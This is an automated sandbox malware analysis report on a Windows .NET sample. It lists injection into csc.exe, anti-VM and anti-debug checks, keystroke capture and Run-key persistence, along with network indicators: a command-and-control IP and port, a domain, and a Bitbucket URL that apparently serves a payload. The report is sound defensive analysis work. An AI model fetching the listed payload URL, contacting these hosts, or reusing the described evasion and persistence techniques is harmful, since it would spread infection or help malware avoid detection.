Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pPLwX9wSrD.exe

Overview

General Information

Sample name:pPLwX9wSrD.exe
renamed because original name is a hash value
Original sample name:8ee7bb70506574eb0ba1bffc0bafd993c707d01e54385ca83fb3f731521a9298.exe
Analysis ID:1573894
MD5:1492e1506afedad20933ae244cf658d1
SHA1:db68cd234205c628ebf3a8329246baf3cdc10ead
SHA256:8ee7bb70506574eb0ba1bffc0bafd993c707d01e54385ca83fb3f731521a9298
Tags:181-131-217-244exeuser-JAMESWT_MHT
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to prevent local Windows debugging
Drops large PE files
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to delete services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • pPLwX9wSrD.exe (PID: 5732 cmdline: "C:\Users\user\Desktop\pPLwX9wSrD.exe" MD5: 1492E1506AFEDAD20933AE244CF658D1)
    • csc.exe (PID: 2604 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.3523495000.00000000099F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000003.00000002.3521980396.0000000008242000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000003.00000002.3521352384.00000000070A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: csc.exe PID: 2604JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          SourceRuleDescriptionAuthorStrings
          3.2.csc.exe.82c6ca8.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            3.2.csc.exe.99f0000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              System Summary

              barindex
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\pPLwX9wSrD.exe, ProcessId: 5732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OrionLegacyCLI
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: pPLwX9wSrD.exeReversingLabs: Detection: 39%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: pPLwX9wSrD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49788 version: TLS 1.2
              Source: Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdb source: pPLwX9wSrD.exe, OrionLegacyCLI.exe.0.dr
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3521352384.0000000007308000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.0000000008713000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3524105606.000000000A310000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: Srlfeb.pdb source: csc.exe, 00000003.00000002.3522778498.0000000009760000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000833C000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3521352384.0000000007308000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.0000000008713000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3524105606.000000000A310000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdbP2N source: pPLwX9wSrD.exe, OrionLegacyCLI.exe.0.dr
              Source: Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000002.3522778498.0000000009760000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000833C000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmp
              Source: global trafficTCP traffic: 192.168.2.5:49780 -> 181.131.217.244:30203
              Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 181.131.217.244 181.131.217.244
              Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: navegacionseguracol24vip.org
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: csc.exe, 00000003.00000002.3521352384.000000000739B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
              Source: csc.exe, 00000003.00000002.3521352384.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3521352384.00000000070A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: pPLwX9wSrD.exe, OrionLegacyCLI.exe.0.drString found in binary or memory: http://www.geomind.co.kr/
              Source: pPLwX9wSrD.exe, OrionLegacyCLI.exe.0.drString found in binary or memory: http://www.geomind.co.kr/Online
              Source: csc.exe, 00000003.00000002.3521352384.00000000070A1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3521352384.0000000007387000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
              Source: csc.exe, 00000003.00000002.3521352384.0000000007308000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3521352384.00000000070A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
              Source: csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: csc.exe, 00000003.00000002.3521352384.00000000070A1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49788 version: TLS 1.2
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00411810 GetAsyncKeyState,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowTextA,SetWindowTextA,CallWindowProcA,0_2_00411810

              System Summary

              barindex
              Source: 0.2.pPLwX9wSrD.exe.d00000.1.raw.unpack, MapAnalyzer.csLarge array initialization: LinkSetMap: array initializer size 543568
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeFile dump: OrionLegacyCLI.exe.0.dr 979567344Jump to dropped file
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0046DEE0 OpenServiceA,DeleteService,CloseServiceHandle,0_2_0046DEE0
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_004572FB0_2_004572FB
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_004582830_2_00458283
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0045494A0_2_0045494A
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00457AD40_2_00457AD4
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00457A9C0_2_00457A9C
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00457B5D0_2_00457B5D
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00460B100_2_00460B10
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00458B210_2_00458B21
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00462C200_2_00462C20
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00457DBD0_2_00457DBD
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00458E120_2_00458E12
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00457E2D0_2_00457E2D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06E171483_2_06E17148
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06E171583_2_06E17158
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06E11BC03_2_06E11BC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06E11BB03_2_06E11BB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06E148683_2_06E14868
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0986073F3_2_0986073F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09860A773_2_09860A77
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_098617E83_2_098617E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09878AE83_2_09878AE8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0987258B3_2_0987258B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_098781173_2_09878117
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_098781283_2_09878128
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09878AD93_2_09878AD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09878D3A3_2_09878D3A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_098734743_2_09873474
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA59383_2_09AA5938
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AAAA003_2_09AAAA00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA6DD83_2_09AA6DD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA0DD83_2_09AA0DD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA27583_2_09AA2758
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA76203_2_09AA7620
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AAC9E33_2_09AAC9E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AAA9F13_2_09AAA9F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AACBBB3_2_09AACBBB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AACBF23_2_09AACBF2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AACAEE3_2_09AACAEE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AAAA003_2_09AAAA00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA6DC83_2_09AA6DC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA71113_2_09AA7111
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA50683_2_09AA5068
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AAA4B03_2_09AAA4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA27483_2_09AA2748
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA76123_2_09AA7612
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: String function: 00466CB0 appears 345 times
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: String function: 0045E040 appears 38 times
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: String function: 0047F3E0 appears 51 times
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: String function: 0047F326 appears 51 times
              Source: pPLwX9wSrD.exeBinary or memory string: OriginalFilename vs pPLwX9wSrD.exe
              Source: pPLwX9wSrD.exe, 00000000.00000000.2268988754.0000000000611000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDBServer.EXEB vs pPLwX9wSrD.exe
              Source: pPLwX9wSrD.exe, 00000000.00000002.2508616896.0000000000E36000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYtzlkwamt.exe" vs pPLwX9wSrD.exe
              Source: pPLwX9wSrD.exeBinary or memory string: OriginalFilenameDBServer.EXEB vs pPLwX9wSrD.exe
              Source: pPLwX9wSrD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.pPLwX9wSrD.exe.d00000.1.raw.unpack, MapAnalyzer.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.pPLwX9wSrD.exe.d00000.1.raw.unpack, ResponderElement.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.pPLwX9wSrD.exe.d00000.1.raw.unpack, ResponderElement.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.csc.exe.851ed28.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.csc.exe.851ed28.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.csc.exe.851ed28.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.csc.exe.851ed28.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.9760000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.9760000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.9760000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.9760000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.a310000.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 3.2.csc.exe.a310000.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 3.2.csc.exe.a310000.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 3.2.csc.exe.a310000.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 3.2.csc.exe.a310000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 3.2.csc.exe.9760000.3.raw.unpack, Y0wasUa6P9xTSH777MP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.2.csc.exe.a310000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 3.2.csc.exe.a310000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 3.2.csc.exe.9760000.3.raw.unpack, yv34WfaQCCjcVmxruN1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.2.csc.exe.a310000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.2.csc.exe.a310000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 3.2.csc.exe.a310000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 3.2.csc.exe.9760000.3.raw.unpack, h5gmjUDfwmEIIaJIRm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 3.2.csc.exe.9760000.3.raw.unpack, h5gmjUDfwmEIIaJIRm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal92.evad.winEXE@3/1@2/2
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: CreateServiceA,CloseServiceHandle,0_2_0046DE70
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_004A143E FindResourceA,LoadResource,LockResource,FreeResource,0_2_004A143E
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0046DF40 LockServiceDatabase,OpenServiceA,ChangeServiceConfigA,ChangeServiceConfig2A,CloseServiceHandle,UnlockServiceDatabase,GetLastError,QueryServiceLockStatusA,QueryServiceLockStatusA,0_2_0046DF40
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeFile created: C:\Users\user\Videos\OrionLegacyJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\mono1234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ylbjyinrk.exeJump to behavior
              Source: pPLwX9wSrD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: pPLwX9wSrD.exeReversingLabs: Detection: 39%
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeFile read: C:\Users\user\Desktop\pPLwX9wSrD.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\pPLwX9wSrD.exe "C:\Users\user\Desktop\pPLwX9wSrD.exe"
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeSection loaded: odbc32.dllJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeSection loaded: crowdstrikeceoisextragay.dllJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dllJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: schannel.dllJump to behavior
